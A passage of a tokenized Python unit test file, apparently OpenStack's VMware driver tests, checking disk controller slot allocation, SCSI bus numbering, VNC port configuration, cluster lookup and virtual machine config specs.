op|'.'
name|'VirtualDisk'
op|'('
number|'200'
op|','
number|'0'
op|')'
newline|'\n'
name|'disk2'
op|'='
name|'fake'
op|'.'
name|'VirtualDisk'
op|'('
number|'200'
op|','
number|'1'
op|')'
newline|'\n'
name|'disk3'
op|'='
name|'fake'
op|'.'
name|'VirtualDisk'
op|'('
number|'201'
op|','
number|'1'
op|')'
newline|'\n'
name|'ide0'
op|'='
name|'fake'
op|'.'
name|'VirtualIDEController'
op|'('
number|'200'
op|')'
newline|'\n'
name|'ide1'
op|'='
name|'fake'
op|'.'
name|'VirtualIDEController'
op|'('
number|'201'
op|')'
newline|'\n'
name|'scsi0'
op|'='
name|'fake'
op|'.'
name|'VirtualLsiLogicController'
op|'('
name|'key'
op|'='
number|'1000'
op|','
name|'scsiCtlrUnitNumber'
op|'='
number|'7'
op|')'
newline|'\n'
name|'devices'
op|'='
op|'['
name|'disk1'
op|','
name|'disk2'
op|','
name|'disk3'
op|','
name|'ide0'
op|','
name|'ide1'
op|','
name|'scsi0'
op|']'
newline|'\n'
name|'taken'
op|'='
name|'vm_util'
op|'.'
name|'_find_allocated_slots'
op|'('
name|'devices'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
op|'['
number|'0'
op|','
number|'1'
op|']'
op|','
name|'sorted'
op|'('
name|'taken'
op|'['
number|'200'
op|']'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
op|'['
number|'1'
op|']'
op|','
name|'taken'
op|'['
number|'201'
op|']'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
op|'['
number|'7'
op|']'
op|','
name|'taken'
op|'['
number|'1000'
op|']'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_bus_number_for_scsi_controller
dedent|''
name|'def'
name|'test_get_bus_number_for_scsi_controller'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'devices'
op|'='
op|'['
name|'fake'
op|'.'
name|'VirtualLsiLogicController'
op|'('
number|'1000'
op|','
name|'scsiCtlrUnitNumber'
op|'='
number|'7'
op|','
nl|'\n'
name|'busNumber'
op|'='
number|'0'
op|')'
op|','
nl|'\n'
name|'fake'
op|'.'
name|'VirtualLsiLogicController'
op|'('
number|'1002'
op|','
name|'scsiCtlrUnitNumber'
op|'='
number|'7'
op|','
nl|'\n'
name|'busNumber'
op|'='
number|'2'
op|')'
op|']'
newline|'\n'
name|'bus_number'
op|'='
name|'vm_util'
op|'.'
name|'_get_bus_number_for_scsi_controller'
op|'('
name|'devices'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'1'
op|','
name|'bus_number'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_bus_number_for_scsi_controller_buses_used_up
dedent|''
name|'def'
name|'test_get_bus_number_for_scsi_controller_buses_used_up'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'devices'
op|'='
op|'['
name|'fake'
op|'.'
name|'VirtualLsiLogicController'
op|'('
number|'1000'
op|','
name|'scsiCtlrUnitNumber'
op|'='
number|'7'
op|','
nl|'\n'
name|'busNumber'
op|'='
number|'0'
op|')'
op|','
nl|'\n'
name|'fake'
op|'.'
name|'VirtualLsiLogicController'
op|'('
number|'1001'
op|','
name|'scsiCtlrUnitNumber'
op|'='
number|'7'
op|','
nl|'\n'
name|'busNumber'
op|'='
number|'1'
op|')'
op|','
nl|'\n'
name|'fake'
op|'.'
name|'VirtualLsiLogicController'
op|'('
number|'1002'
op|','
name|'scsiCtlrUnitNumber'
op|'='
number|'7'
op|','
nl|'\n'
name|'busNumber'
op|'='
number|'2'
op|')'
op|','
nl|'\n'
name|'fake'
op|'.'
name|'VirtualLsiLogicController'
op|'('
number|'1003'
op|','
name|'scsiCtlrUnitNumber'
op|'='
number|'7'
op|','
nl|'\n'
name|'busNumber'
op|'='
number|'3'
op|')'
op|']'
newline|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'vexc'
op|'.'
name|'VMwareDriverException'
op|','
nl|'\n'
name|'vm_util'
op|'.'
name|'_get_bus_number_for_scsi_controller'
op|','
nl|'\n'
name|'devices'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_allocate_controller_key_and_unit_number_ide_default
dedent|''
name|'def'
name|'test_allocate_controller_key_and_unit_number_ide_default'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
comment|'# Test that default IDE controllers are used when there is a free slot'
nl|'\n'
comment|'# on them'
nl|'\n'
indent|' '
name|'disk1'
op|'='
name|'fake'
op|'.'
name|'VirtualDisk'
op|'('
number|'200'
op|','
number|'0'
op|')'
newline|'\n'
name|'disk2'
op|'='
name|'fake'
op|'.'
name|'VirtualDisk'
op|'('
number|'200'
op|','
number|'1'
op|')'
newline|'\n'
name|'ide0'
op|'='
name|'fake'
op|'.'
name|'VirtualIDEController'
op|'('
number|'200'
op|')'
newline|'\n'
name|'ide1'
op|'='
name|'fake'
op|'.'
name|'VirtualIDEController'
op|'('
number|'201'
op|')'
newline|'\n'
name|'devices'
op|'='
op|'['
name|'disk1'
op|','
name|'disk2'
op|','
name|'ide0'
op|','
name|'ide1'
op|']'
newline|'\n'
op|'('
name|'controller_key'
op|','
name|'unit_number'
op|','
nl|'\n'
name|'controller_spec'
op|')'
op|'='
name|'vm_util'
op|'.'
name|'allocate_controller_key_and_unit_number'
op|'('
nl|'\n'
name|'None'
op|','
nl|'\n'
name|'devices'
op|','
nl|'\n'
string|"'ide'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'201'
op|','
name|'controller_key'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'0'
op|','
name|'unit_number'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertIsNone'
op|'('
name|'controller_spec'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_allocate_controller_key_and_unit_number_ide
dedent|''
name|'def'
name|'test_allocate_controller_key_and_unit_number_ide'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
comment|'# Test that a new controller is created when there is no free slot on'
nl|'\n'
comment|'# the default IDE controllers'
nl|'\n'
indent|' '
name|'ide0'
op|'='
name|'fake'
op|'.'
name|'VirtualIDEController'
op|'('
number|'200'
op|')'
newline|'\n'
name|'ide1'
op|'='
name|'fake'
op|'.'
name|'VirtualIDEController'
op|'('
number|'201'
op|')'
newline|'\n'
name|'devices'
op|'='
op|'['
name|'ide0'
op|','
name|'ide1'
op|']'
newline|'\n'
name|'for'
name|'controller_key'
name|'in'
op|'['
number|'200'
op|','
number|'201'
op|']'
op|':'
newline|'\n'
indent|' '
name|'for'
name|'unit_number'
name|'in'
op|'['
number|'0'
op|','
number|'1'
op|']'
op|':'
newline|'\n'
indent|' '
name|'disk'
op|'='
name|'fake'
op|'.'
name|'VirtualDisk'
op|'('
name|'controller_key'
op|','
name|'unit_number'
op|')'
newline|'\n'
name|'devices'
op|'.'
name|'append'
op|'('
name|'disk'
op|')'
newline|'\n'
dedent|''
dedent|''
name|'factory'
op|'='
name|'fake'
op|'.'
name|'FakeFactory'
op|'('
op|')'
newline|'\n'
op|'('
name|'controller_key'
op|','
name|'unit_number'
op|','
nl|'\n'
name|'controller_spec'
op|')'
op|'='
name|'vm_util'
op|'.'
name|'allocate_controller_key_and_unit_number'
op|'('
nl|'\n'
name|'factory'
op|','
nl|'\n'
name|'devices'
op|','
nl|'\n'
string|"'ide'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
op|'-'
number|'101'
op|','
name|'controller_key'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'0'
op|','
name|'unit_number'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertIsNotNone'
op|'('
name|'controller_spec'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_allocate_controller_key_and_unit_number_scsi
dedent|''
name|'def'
name|'test_allocate_controller_key_and_unit_number_scsi'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
comment|'# Test that we allocate on existing SCSI controller if there is a free'
nl|'\n'
comment|'# slot on it'
nl|'\n'
indent|' '
name|'devices'
op|'='
op|'['
name|'fake'
op|'.'
name|'VirtualLsiLogicController'
op|'('
number|'1000'
op|','
name|'scsiCtlrUnitNumber'
op|'='
number|'7'
op|')'
op|']'
newline|'\n'
name|'for'
name|'unit_number'
name|'in'
name|'range'
op|'('
number|'7'
op|')'
op|':'
newline|'\n'
indent|' '
name|'disk'
op|'='
name|'fake'
op|'.'
name|'VirtualDisk'
op|'('
number|'1000'
op|','
name|'unit_number'
op|')'
newline|'\n'
name|'devices'
op|'.'
name|'append'
op|'('
name|'disk'
op|')'
newline|'\n'
dedent|''
name|'factory'
op|'='
name|'fake'
op|'.'
name|'FakeFactory'
op|'('
op|')'
newline|'\n'
op|'('
name|'controller_key'
op|','
name|'unit_number'
op|','
nl|'\n'
name|'controller_spec'
op|')'
op|'='
name|'vm_util'
op|'.'
name|'allocate_controller_key_and_unit_number'
op|'('
nl|'\n'
name|'factory'
op|','
nl|'\n'
name|'devices'
op|','
nl|'\n'
name|'constants'
op|'.'
name|'DEFAULT_ADAPTER_TYPE'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'1000'
op|','
name|'controller_key'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'8'
op|','
name|'unit_number'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertIsNone'
op|'('
name|'controller_spec'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_allocate_controller_key_and_unit_number_scsi_new_controller
dedent|''
name|'def'
name|'test_allocate_controller_key_and_unit_number_scsi_new_controller'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
comment|'# Test that we allocate on existing SCSI controller if there is a free'
nl|'\n'
comment|'# slot on it'
nl|'\n'
indent|' '
name|'devices'
op|'='
op|'['
name|'fake'
op|'.'
name|'VirtualLsiLogicController'
op|'('
number|'1000'
op|','
name|'scsiCtlrUnitNumber'
op|'='
number|'15'
op|')'
op|']'
newline|'\n'
name|'for'
name|'unit_number'
name|'in'
name|'range'
op|'('
number|'15'
op|')'
op|':'
newline|'\n'
indent|' '
name|'disk'
op|'='
name|'fake'
op|'.'
name|'VirtualDisk'
op|'('
number|'1000'
op|','
name|'unit_number'
op|')'
newline|'\n'
name|'devices'
op|'.'
name|'append'
op|'('
name|'disk'
op|')'
newline|'\n'
dedent|''
name|'factory'
op|'='
name|'fake'
op|'.'
name|'FakeFactory'
op|'('
op|')'
newline|'\n'
op|'('
name|'controller_key'
op|','
name|'unit_number'
op|','
nl|'\n'
name|'controller_spec'
op|')'
op|'='
name|'vm_util'
op|'.'
name|'allocate_controller_key_and_unit_number'
op|'('
nl|'\n'
name|'factory'
op|','
nl|'\n'
name|'devices'
op|','
nl|'\n'
name|'constants'
op|'.'
name|'DEFAULT_ADAPTER_TYPE'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
op|'-'
number|'101'
op|','
name|'controller_key'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'0'
op|','
name|'unit_number'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'1'
op|','
name|'controller_spec'
op|'.'
name|'device'
op|'.'
name|'busNumber'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_vnc_config_spec
dedent|''
name|'def'
name|'test_get_vnc_config_spec'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'fake_factory'
op|'='
name|'fake'
op|'.'
name|'FakeFactory'
op|'('
op|')'
newline|'\n'
name|'result'
op|'='
name|'vm_util'
op|'.'
name|'get_vnc_config_spec'
op|'('
name|'fake_factory'
op|','
nl|'\n'
number|'7'
op|')'
newline|'\n'
name|'expected'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualMachineConfigSpec'"
op|')'
newline|'\n'
name|'expected'
op|'.'
name|'extraConfig'
op|'='
op|'['
op|']'
newline|'\n'
nl|'\n'
name|'remote_display_vnc_enabled'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:OptionValue'"
op|')'
newline|'\n'
name|'remote_display_vnc_enabled'
op|'.'
name|'value'
op|'='
string|"'true'"
newline|'\n'
name|'remote_display_vnc_enabled'
op|'.'
name|'key'
op|'='
string|"'RemoteDisplay.vnc.enabled'"
newline|'\n'
name|'expected'
op|'.'
name|'extraConfig'
op|'.'
name|'append'
op|'('
name|'remote_display_vnc_enabled'
op|')'
newline|'\n'
nl|'\n'
name|'remote_display_vnc_port'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:OptionValue'"
op|')'
newline|'\n'
name|'remote_display_vnc_port'
op|'.'
name|'value'
op|'='
number|'7'
newline|'\n'
name|'remote_display_vnc_port'
op|'.'
name|'key'
op|'='
string|"'RemoteDisplay.vnc.port'"
newline|'\n'
name|'expected'
op|'.'
name|'extraConfig'
op|'.'
name|'append'
op|'('
name|'remote_display_vnc_port'
op|')'
newline|'\n'
nl|'\n'
name|'remote_display_vnc_keymap'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:OptionValue'"
op|')'
newline|'\n'
name|'remote_display_vnc_keymap'
op|'.'
name|'value'
op|'='
string|"'en-us'"
newline|'\n'
name|'remote_display_vnc_keymap'
op|'.'
name|'key'
op|'='
string|"'RemoteDisplay.vnc.keyMap'"
newline|'\n'
name|'expected'
op|'.'
name|'extraConfig'
op|'.'
name|'append'
op|'('
name|'remote_display_vnc_keymap'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'expected'
op|','
name|'result'
op|')'
newline|'\n'
nl|'\n'
DECL|member|_create_fake_vms
dedent|''
name|'def'
name|'_create_fake_vms'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'fake_vms'
op|'='
name|'fake'
op|'.'
name|'FakeRetrieveResult'
op|'('
op|')'
newline|'\n'
name|'OptionValue'
op|'='
name|'collections'
op|'.'
name|'namedtuple'
op|'('
string|"'OptionValue'"
op|','
op|'['
string|"'key'"
op|','
string|"'value'"
op|']'
op|')'
newline|'\n'
name|'for'
name|'i'
name|'in'
name|'range'
op|'('
number|'10'
op|')'
op|':'
newline|'\n'
indent|' '
name|'vm'
op|'='
name|'fake'
op|'.'
name|'ManagedObject'
op|'('
op|')'
newline|'\n'
name|'opt_val'
op|'='
name|'OptionValue'
op|'('
name|'key'
op|'='
string|"''"
op|','
name|'value'
op|'='
number|'5900'
op|'+'
name|'i'
op|')'
newline|'\n'
name|'vm'
op|'.'
name|'set'
op|'('
name|'vm_util'
op|'.'
name|'VNC_CONFIG_KEY'
op|','
name|'opt_val'
op|')'
newline|'\n'
name|'fake_vms'
op|'.'
name|'add_object'
op|'('
name|'vm'
op|')'
newline|'\n'
dedent|''
name|'return'
name|'fake_vms'
newline|'\n'
nl|'\n'
DECL|member|test_get_vnc_port
dedent|''
name|'def'
name|'test_get_vnc_port'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'fake_vms'
op|'='
name|'self'
op|'.'
name|'_create_fake_vms'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'flags'
op|'('
name|'vnc_port'
op|'='
number|'5900'
op|','
name|'group'
op|'='
string|"'vmware'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'flags'
op|'('
name|'vnc_port_total'
op|'='
number|'10000'
op|','
name|'group'
op|'='
string|"'vmware'"
op|')'
newline|'\n'
name|'actual'
op|'='
name|'vm_util'
op|'.'
name|'get_vnc_port'
op|'('
nl|'\n'
name|'fake'
op|'.'
name|'FakeObjectRetrievalSession'
op|'('
name|'fake_vms'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'actual'
op|','
number|'5910'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_vnc_port_exhausted
dedent|''
name|'def'
name|'test_get_vnc_port_exhausted'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'fake_vms'
op|'='
name|'self'
op|'.'
name|'_create_fake_vms'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'flags'
op|'('
name|'vnc_port'
op|'='
number|'5900'
op|','
name|'group'
op|'='
string|"'vmware'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'flags'
op|'('
name|'vnc_port_total'
op|'='
number|'10'
op|','
name|'group'
op|'='
string|"'vmware'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'exception'
op|'.'
name|'ConsolePortRangeExhausted'
op|','
nl|'\n'
name|'vm_util'
op|'.'
name|'get_vnc_port'
op|','
nl|'\n'
name|'fake'
op|'.'
name|'FakeObjectRetrievalSession'
op|'('
name|'fake_vms'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_cluster_ref_by_name_none
dedent|''
name|'def'
name|'test_get_cluster_ref_by_name_none'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'fake_objects'
op|'='
name|'fake'
op|'.'
name|'FakeRetrieveResult'
op|'('
op|')'
newline|'\n'
name|'ref'
op|'='
name|'vm_util'
op|'.'
name|'get_cluster_ref_by_name'
op|'('
nl|'\n'
name|'fake'
op|'.'
name|'FakeObjectRetrievalSession'
op|'('
name|'fake_objects'
op|')'
op|','
string|"'fake_cluster'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertIsNone'
op|'('
name|'ref'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_cluster_ref_by_name_exists
dedent|''
name|'def'
name|'test_get_cluster_ref_by_name_exists'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'fake_objects'
op|'='
name|'fake'
op|'.'
name|'FakeRetrieveResult'
op|'('
op|')'
newline|'\n'
name|'cluster'
op|'='
name|'fake'
op|'.'
name|'ClusterComputeResource'
op|'('
name|'name'
op|'='
string|"'cluster'"
op|')'
newline|'\n'
name|'fake_objects'
op|'.'
name|'add_object'
op|'('
name|'cluster'
op|')'
newline|'\n'
name|'ref'
op|'='
name|'vm_util'
op|'.'
name|'get_cluster_ref_by_name'
op|'('
nl|'\n'
name|'fake'
op|'.'
name|'FakeObjectRetrievalSession'
op|'('
name|'fake_objects'
op|')'
op|','
string|"'cluster'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertIs'
op|'('
name|'cluster'
op|'.'
name|'obj'
op|','
name|'ref'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_cluster_ref_by_name_missing
dedent|''
name|'def'
name|'test_get_cluster_ref_by_name_missing'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'fake_objects'
op|'='
name|'fake'
op|'.'
name|'FakeRetrieveResult'
op|'('
op|')'
newline|'\n'
name|'fake_objects'
op|'.'
name|'add_object'
op|'('
name|'partialObject'
op|'('
name|'path'
op|'='
string|"'cluster'"
op|')'
op|')'
newline|'\n'
name|'ref'
op|'='
name|'vm_util'
op|'.'
name|'get_cluster_ref_by_name'
op|'('
nl|'\n'
name|'fake'
op|'.'
name|'FakeObjectRetrievalSession'
op|'('
name|'fake_objects'
op|')'
op|','
string|"'cluster'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertIsNone'
op|'('
name|'ref'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_propset_dict_simple
dedent|''
name|'def'
name|'test_propset_dict_simple'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'ObjectContent'
op|'='
name|'collections'
op|'.'
name|'namedtuple'
op|'('
string|"'ObjectContent'"
op|','
op|'['
string|"'propSet'"
op|']'
op|')'
newline|'\n'
name|'DynamicProperty'
op|'='
name|'collections'
op|'.'
name|'namedtuple'
op|'('
string|"'Property'"
op|','
op|'['
string|"'name'"
op|','
string|"'val'"
op|']'
op|')'
newline|'\n'
nl|'\n'
name|'object'
op|'='
name|'ObjectContent'
op|'('
name|'propSet'
op|'='
op|'['
nl|'\n'
name|'DynamicProperty'
op|'('
name|'name'
op|'='
string|"'foo'"
op|','
name|'val'
op|'='
string|'"bar"'
op|')'
op|']'
op|')'
newline|'\n'
name|'propdict'
op|'='
name|'vm_util'
op|'.'
name|'propset_dict'
op|'('
name|'object'
op|'.'
name|'propSet'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|'"bar"'
op|','
name|'propdict'
op|'['
string|"'foo'"
op|']'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_propset_dict_complex
dedent|''
name|'def'
name|'test_propset_dict_complex'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'ObjectContent'
op|'='
name|'collections'
op|'.'
name|'namedtuple'
op|'('
string|"'ObjectContent'"
op|','
op|'['
string|"'propSet'"
op|']'
op|')'
newline|'\n'
name|'DynamicProperty'
op|'='
name|'collections'
op|'.'
name|'namedtuple'
op|'('
string|"'Property'"
op|','
op|'['
string|"'name'"
op|','
string|"'val'"
op|']'
op|')'
newline|'\n'
name|'MoRef'
op|'='
name|'collections'
op|'.'
name|'namedtuple'
op|'('
string|"'Val'"
op|','
op|'['
string|"'value'"
op|']'
op|')'
newline|'\n'
nl|'\n'
name|'object'
op|'='
name|'ObjectContent'
op|'('
name|'propSet'
op|'='
op|'['
nl|'\n'
name|'DynamicProperty'
op|'('
name|'name'
op|'='
string|"'foo'"
op|','
name|'val'
op|'='
string|'"bar"'
op|')'
op|','
nl|'\n'
name|'DynamicProperty'
op|'('
name|'name'
op|'='
string|"'some.thing'"
op|','
nl|'\n'
name|'val'
op|'='
name|'MoRef'
op|'('
name|'value'
op|'='
string|"'else'"
op|')'
op|')'
op|','
nl|'\n'
name|'DynamicProperty'
op|'('
name|'name'
op|'='
string|"'another.thing'"
op|','
name|'val'
op|'='
string|"'value'"
op|')'
op|']'
op|')'
newline|'\n'
nl|'\n'
name|'propdict'
op|'='
name|'vm_util'
op|'.'
name|'propset_dict'
op|'('
name|'object'
op|'.'
name|'propSet'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|'"bar"'
op|','
name|'propdict'
op|'['
string|"'foo'"
op|']'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertTrue'
op|'('
name|'hasattr'
op|'('
name|'propdict'
op|'['
string|"'some.thing'"
op|']'
op|','
string|"'value'"
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|'"else"'
op|','
name|'propdict'
op|'['
string|"'some.thing'"
op|']'
op|'.'
name|'value'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|'"value"'
op|','
name|'propdict'
op|'['
string|"'another.thing'"
op|']'
op|')'
newline|'\n'
nl|'\n'
DECL|member|_test_detach_virtual_disk_spec
dedent|''
name|'def'
name|'_test_detach_virtual_disk_spec'
op|'('
name|'self'
op|','
name|'destroy_disk'
op|'='
name|'False'
op|')'
op|':'
newline|'\n'
indent|' '
name|'virtual_device_config'
op|'='
name|'vm_util'
op|'.'
name|'detach_virtual_disk_spec'
op|'('
nl|'\n'
name|'fake'
op|'.'
name|'FakeFactory'
op|'('
op|')'
op|','
nl|'\n'
string|"'fake_device'"
op|','
nl|'\n'
name|'destroy_disk'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'remove'"
op|','
name|'virtual_device_config'
op|'.'
name|'operation'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'fake_device'"
op|','
name|'virtual_device_config'
op|'.'
name|'device'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'ns0:VirtualDeviceConfigSpec'"
op|','
nl|'\n'
name|'virtual_device_config'
op|'.'
name|'obj_name'
op|')'
newline|'\n'
name|'if'
name|'destroy_disk'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'destroy'"
op|','
name|'virtual_device_config'
op|'.'
name|'fileOperation'
op|')'
newline|'\n'
dedent|''
name|'else'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertFalse'
op|'('
name|'hasattr'
op|'('
name|'virtual_device_config'
op|','
string|"'fileOperation'"
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_detach_virtual_disk_spec
dedent|''
dedent|''
name|'def'
name|'test_detach_virtual_disk_spec'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'_test_detach_virtual_disk_spec'
op|'('
name|'destroy_disk'
op|'='
name|'False'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_detach_virtual_disk_destroy_spec
dedent|''
name|'def'
name|'test_detach_virtual_disk_destroy_spec'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'_test_detach_virtual_disk_spec'
op|'('
name|'destroy_disk'
op|'='
name|'True'
op|')'
newline|'\n'
nl|'\n'
DECL|member|_create_vm_config_spec
dedent|''
name|'def'
name|'_create_vm_config_spec'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'fake_factory'
op|'='
name|'fake'
op|'.'
name|'FakeFactory'
op|'('
op|')'
newline|'\n'
name|'spec'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualMachineConfigSpec'"
op|')'
newline|'\n'
name|'spec'
op|'.'
name|'name'
op|'='
name|'self'
op|'.'
name|'_instance'
op|'.'
name|'uuid'
newline|'\n'
name|'spec'
op|'.'
name|'instanceUuid'
op|'='
name|'self'
op|'.'
name|'_instance'
op|'.'
name|'uuid'
newline|'\n'
name|'spec'
op|'.'
name|'deviceChange'
op|'='
op|'['
op|']'
newline|'\n'
name|'spec'
op|'.'
name|'numCPUs'
op|'='
number|'2'
newline|'\n'
nl|'\n'
name|'spec'
op|'.'
name|'version'
op|'='
name|'None'
newline|'\n'
name|'spec'
op|'.'
name|'memoryMB'
op|'='
number|'2048'
newline|'\n'
name|'spec'
op|'.'
name|'guestId'
op|'='
string|"'otherGuest'"
newline|'\n'
name|'spec'
op|'.'
name|'extraConfig'
op|'='
op|'['
op|']'
newline|'\n'
nl|'\n'
name|'extra_config'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|'"ns0:OptionValue"'
op|')'
newline|'\n'
name|'extra_config'
op|'.'
name|'value'
op|'='
name|'self'
op|'.'
name|'_instance'
op|'.'
name|'uuid'
newline|'\n'
name|'extra_config'
op|'.'
name|'key'
op|'='
string|"'nvp.vm-uuid'"
newline|'\n'
name|'spec'
op|'.'
name|'extraConfig'
op|'.'
name|'append'
op|'('
name|'extra_config'
op|')'
newline|'\n'
name|'spec'
op|'.'
name|'files'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:VirtualMachineFileInfo'"
op|')'
newline|'\n'
name|'spec'
op|'.'
name|'files'
op|'.'
name|'vmPathName'
op|'='
string|"'[fake-datastore]'"
newline|'\n'
nl|'\n'
name|'spec'
op|'.'
name|'managedBy'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:ManagedByInfo'"
op|')'
newline|'\n'
name|'spec'
op|'.'
name|'managedBy'
op|'.'
name|'extensionKey'
op|'='
string|"'org.openstack.compute'"
newline|'\n'
name|'spec'
op|'.'
name|'managedBy'
op|'.'
name|'type'
op|'='
string|"'instance'"
newline|'\n'
nl|'\n'
name|'spec'
op|'.'
name|'tools'
op|'='
name|'fake_factory'
op|'.'
name|'create'
op|'('
string|"'ns0:ToolsConfigInfo'"
op|')'
newline|'\n'
name|'spec'
op|'.'
name|'tools'
op|'.'
name|'afterPowerOn'
op|'='
name|'True'
newline|'\n'
name|'spec'
op|'.'
name|'tools'
op|'.'
name|'afterResume'
op|'='
name|'True'
newline|'\n'
name|'spec'
op|'.'
name|'tools'
op|'.'
name|'beforeGuestReboot'
op|'='
name|'True'
newline|'\n'
name|'spec'
op|'.'
name|'tools'
op|'.'
name|'beforeGuestShutdown'
op|'='
name|'True'
newline|'\n'
name|'spec'
op|'.'
name|'tools'
op|'.'
name|'beforeGuestStandby'
op|'='
name|'True'
newline|'\n'
name|'return'
name|'spec'
newline|'\n'
nl|'\n'
DECL|member|test_get_vm_extra_config_spec
dedent|''
name|'def'
name|'test_get_vm_extra_config_spec'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
nl|'\n'
indent|' '
name|'fake_factory'
op|'='
name|'fake'
op|'.'
name|'FakeFactory'
op|'('
op|')'
newline|'\n'
name|'extra_opts'
op|'='
op|'{'
name|'mock'
op|'.'
name|'sentinel'
op|'.'
name|'key'
op|':'
name|'mock'
op|'.'
name|'sentinel'
op|'.'
name|'value'
op|'}'
newline|'\n'
name|'res'
op|'='
name|'vm_util'
op|'.'
name|'get_vm_extra_config_spec'
op|'('
name|'fake_factory'
op|','
name|'extra_opts'
op|')'
newline|'\n'
nl|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'1'
op|','
name|'len'
op|'('
name|'res'
op|'.'
name|'extraConfig'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'mock'
op|'.'
name|'sentinel'
op|'.'
name|'key'
op|','
name|'res'
op|'.'
name|'extraConfig'
op|'['
number|'0'
op|']'
op|'.'
name|'key'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'mock'
